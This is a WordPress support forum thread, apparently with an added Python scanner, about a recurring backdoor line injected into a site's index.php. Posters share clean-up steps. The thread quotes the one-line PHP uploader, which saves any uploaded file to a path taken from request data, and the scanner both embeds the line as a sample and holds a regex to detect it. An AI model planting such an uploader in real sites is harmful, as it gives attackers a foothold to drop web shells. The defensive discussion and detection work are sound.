Title: Random $_FILES['F1l3'] Code
Last modified: August 24, 2016

---

# Random $_FILES['F1l3'] Code

 *  Resolved [Kazam Creative](https://wordpress.org/support/users/goldenagemedia/)
 * (@goldenagemedia)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/random-_filesf1l3-code/)
 * I have a website where, every now and then the index.php file in the root directory
   gets modified and the following line of code gets added at the very top:
 * `if ($_FILES['F1l3']) {move_uploaded_file($_FILES['F1l3']['tmp_name'], $_POST['Name']); echo 'OK'; Exit;}`
 * This line of code then appears at the top of the live website, which I have to
   keep going in and deleting. I did a Google search but all I could find were dozens
   of other websites with the same problem. Does anyone know what this is and why
   it continues to appear in the index file?
 * I am using the theme Terso, FYI.

Viewing 15 replies - 1 through 15 (of 15 total)

 *  [kmessinger](https://wordpress.org/support/users/kmessinger/)
 * (@kmessinger)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961255)
 * [http://www.goldenagemedia.com.au/](http://www.goldenagemedia.com.au/) this site?
 *  [kmessinger](https://wordpress.org/support/users/kmessinger/)
 * (@kmessinger)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961256)
 * I see this right away:
   WordPress version outdated: Upgrade required.
   Outdated WordPress Found: WordPress Under 4.0
   Outdated Web Server Apache Found: Apache/2.2.24
 *  Thread Starter [Kazam Creative](https://wordpress.org/support/users/goldenagemedia/)
 * (@goldenagemedia)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961257)
 * No, not that site. It doesn’t matter what site it is, as I’ve removed the offending
   code already.
 * Besides, an outdated version of WordPress should not cause the issue as stated
   above.
 *  [kmessinger](https://wordpress.org/support/users/kmessinger/)
 * (@kmessinger)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961264)
 * > Besides, an outdated version of wordpress should not cause the issue as stated
   > above.
 *  Well, it certainly will make the site unsecured.
 *  Thread Starter [Kazam Creative](https://wordpress.org/support/users/goldenagemedia/)
 * (@goldenagemedia)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961281)
 * I’m only looking for solutions to my initial problem, please try and stay on 
   topic.
 *  [stephencottontail](https://wordpress.org/support/users/stephencottontail/)
 * (@stephencottontail)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961287)
 * I think kmessinger’s point was that being unsecured is likely related to your
   problem, given the kinds of sites that are appearing in the Google results. You
   may wish to review some of these resources:
 * [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
   [http://wordpress.org/support/topic/268083#post-1065779](http://wordpress.org/support/topic/268083#post-1065779)
   [http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/)
   [http://ottopress.com/2009/hacked-wordpress-backdoors/](http://ottopress.com/2009/hacked-wordpress-backdoors/)
 * Additional Resources:
   [http://codex.wordpress.org/Hardening_WordPress](http://codex.wordpress.org/Hardening_WordPress)
   [http://sitecheck.sucuri.net/scanner/](http://sitecheck.sucuri.net/scanner/)
   [http://www.unmaskparasites.com/](http://www.unmaskparasites.com/)
   [http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html](http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html)
 *  Thread Starter [Kazam Creative](https://wordpress.org/support/users/goldenagemedia/)
 * (@goldenagemedia)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961296)
 * Thanks Stephen. The website was hacked despite WordPress and plugins being up
   to date, so I replaced all WordPress install files/folders, upgraded the theme
   and changed both FTP and WordPress passwords.
 * It seems to be just this `$_FILES['F1l3']` thing that has come back twice now
   after deletion.
 *  [raghavendra89](https://wordpress.org/support/users/raghavendra89/)
 * (@raghavendra89)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961424)
 * Hello ‘goldenagemedia’,
 * My site was hacked yesterday night. Even I see similar content (`$_FILES['F1l3']`)
   in some of the WordPress files.
 * After upgrading WordPress and the theme, is your site back? Did you do anything else
   to fix the issue?
 * Thanks,
 *  Thread Starter [Kazam Creative](https://wordpress.org/support/users/goldenagemedia/)
 * (@goldenagemedia)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961445)
 * [@raghavendra89](https://wordpress.org/support/users/raghavendra89/),
 * Yes I managed to get it up and running again after reinstalling everything, although
   overnight it seems to have happened again.
 * I have replaced the index.php and wp-blog-header.php files again to fix it, but
   here is a screengrab of the problem when it happens:
    [https://drive.google.com/file/d/0B_DiQO5cOpWkczA0em9hSGVLcDg/view](https://drive.google.com/file/d/0B_DiQO5cOpWkczA0em9hSGVLcDg/view)
 * I think this site might just be being targeted, not sure.
 *  [WPyogi](https://wordpress.org/support/users/wpyogi/)
 * (@wpyogi)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961446)
 * >  it seems to have happened again.
 * That’s generally what happens with hacked sites unless you’ve fully cleaned up
   the hack and secured the site. Did you go through all of the resources listed
   above?
 *  Thread Starter [Kazam Creative](https://wordpress.org/support/users/goldenagemedia/)
 * (@goldenagemedia)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961447)
 * Yes I’ve dealt with many hacked sites over the years, and the methods such as
   the ones listed above have usually fixed them, with no recurring issues.
 * This one is different to what I’ve dealt with before (I’ve never seen this code
   also). No matter how many times I remove the malicious code, it keeps coming 
   back a few days later.
 *  [AnnaBell](https://wordpress.org/support/users/blshka/)
 * (@blshka)
 * [11 years, 1 month ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961546)
 * Hello everyone, I'm new here.
   Sorry, I know this topic is old, but I just found out that one of my websites
   is having the same problem as described above. I cleaned all files where I
   found that piece of code, and I removed one file called zxcvbnm.php, which
   contained this piece of code:
 *     ```
       <!--------------------------------------------
       Sat Apr  4 18:05:04 EST 2015
       owned by NG689Skw (Index Php)
       ng689skw@yahoo.com, Indonesia
       twitter.com/_IndexPhp_
       --------------------------------------------->
   
       Malware code deleted
       ```
   
 * Also, I updated WordPress and all plugins, but I am curious how these Indonesians
   got into this website. What should I do to prevent this from happening again?
   Did anyone find out how to get rid of this for good?
 *  Moderator [Jan Dembowski](https://wordpress.org/support/users/jdembowski/)
 * (@jdembowski)
 * Forum Moderator and Brute Squad
 * [11 years, 1 month ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961548)
 * [@blshka](https://wordpress.org/support/users/blshka/) Please do not post malware
   code in these forums.
 * Delousing a compromised installation isn’t easy but all that we can offer is 
   in this list of links.
 * You need to start working your way through these resources:
   [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
   [http://wordpress.org/support/topic/268083#post-1065779](http://wordpress.org/support/topic/268083#post-1065779)
   [http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/)
   [http://ottopress.com/2009/hacked-wordpress-backdoors/](http://ottopress.com/2009/hacked-wordpress-backdoors/)
 * Additional Resources:
   [Hardening WordPress](http://codex.wordpress.org/Hardening_WordPress)
   [http://sitecheck.sucuri.net/scanner/](http://sitecheck.sucuri.net/scanner/)
   [http://www.unmaskparasites.com/](http://www.unmaskparasites.com/)
   [http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html](http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html)
   [http://blog.sucuri.net/2010/07/understanding-and-cleaning-the-pharma-hack-on-wordpress.html](http://blog.sucuri.net/2010/07/understanding-and-cleaning-the-pharma-hack-on-wordpress.html)
 *  Thread Starter [Kazam Creative](https://wordpress.org/support/users/goldenagemedia/)
 * (@goldenagemedia)
 * [11 years, 1 month ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961549)
 * AnnaBell,
 * I fixed my hacked website by performing the following steps:
 * 1. Changed passwords for both WordPress backend and FTP hosting account.
   2. Deleted wp-includes, wp-admin and root files (except the wp-config.php)
   3. Opened my wp-config.php file to make sure there was no malware code in it
   4. Re-installed WordPress files/folders manually
   5. Updated all plugins
   6. Installed Wordfence plugin and ran a scan
   7. Found files that were infected or shouldn’t be there and either had them
      removed by Wordfence or found the file via FTP and removed the malware
      from the file
 * FYI: I found a lot of new files were strewn throughout the Uploads folder. Wordfence
   was great as it picked up on all these and I just deleted them via Wordfence.
 * The unfortunate reality is hacking is just a part of web life now. I have had
   a fair few websites hacked lately by the [Gantengers Crew](https://twitter.com/gantengerscrew)
   from Indonesia, who openly gloat about their hacking accomplishments.
 * Hope this helps you.
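
A scan for the two things reported in this thread, the injected uploader line and stray files under the uploads folder, added here as an example and not code from any poster or from Wordfence. The names `scan_tree` and `demo`, the default `wp-content/uploads/` location and the sample tree are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# move_uploaded_file() whose destination comes straight from request data,
# the shape of the injected line quoted in this thread.
UPLOADER = re.compile(
    r"move_uploaded_file\s*\(\s*\$_FILES\s*\[[^\]]+\]\s*\[[^\]]+\]\s*,"
    r"\s*\$_(?:POST|GET|REQUEST|COOKIE)\s*\[", re.IGNORECASE)
PHP_SUFFIXES = {".php", ".phtml", ".php5", ".phar"}
UPLOADS = "wp-content/uploads/"  # assumption: default uploads location


def scan_tree(root):
    """Return sorted (relative_path, reason) findings under a WordPress root."""
    root, findings = Path(root), []
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in PHP_SUFFIXES:
            continue
        rel = path.relative_to(root).as_posix()
        if rel.startswith(UPLOADS):
            # Uploads should hold media; review any PHP found there.
            findings.append((rel, "php-in-uploads"))
        text = path.read_text(encoding="utf-8", errors="replace")
        if UPLOADER.search(text):
            findings.append((rel, "request-controlled-upload"))
    return sorted(findings)


def demo():
    """Scan a constructed sample tree (not data from the thread's sites)."""
    files = {
        "index.php": "<?php if ($_FILES['F1l3']) {move_uploaded_file("
                     "$_FILES['F1l3']['tmp_name'], $_POST['Name']); "
                     "echo 'OK'; Exit;} ?>\n<?php require 'wp-blog-header.php';\n",
        "wp-content/plugins/sample/upload.php":  # fixed destination: no hit
            "<?php move_uploaded_file($_FILES['a']['tmp_name'], $dir . '/a.png');\n",
        "wp-content/uploads/2015/04/dropped.php": "<?php /* constructed */\n",
        "wp-content/uploads/2015/04/photo.jpg": "placeholder image bytes",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in files.items():
            target = Path(tmp, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding="utf-8")
        return scan_tree(tmp)

if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{reason:26} {rel}")
```

A clean result only means this one uploader shape is absent; a file that keeps reappearing after deletion points to another foothold that still has to be found.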
 *  [AnnaBell](https://wordpress.org/support/users/blshka/)
 * (@blshka)
 * [11 years, 1 month ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961550)
 * Thanks, guys, for all the advice.
   I did most of those things you mentioned; so far everything looks good.
   Hopefully it will not come back. Thanks once again.


The topic ‘Random $_FILES['F1l3'] Code’ is closed to new replies.

## Tags

 * [file](https://wordpress.org/support/topic-tag/file/)
 * [hacked](https://wordpress.org/support/topic-tag/hacked/)
 * [index](https://wordpress.org/support/topic-tag/index/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 15 replies
 * 7 participants
 * Last reply from: [AnnaBell](https://wordpress.org/support/users/blshka/)
 * Last activity: [11 years, 1 month ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961550)
 * Status: resolved

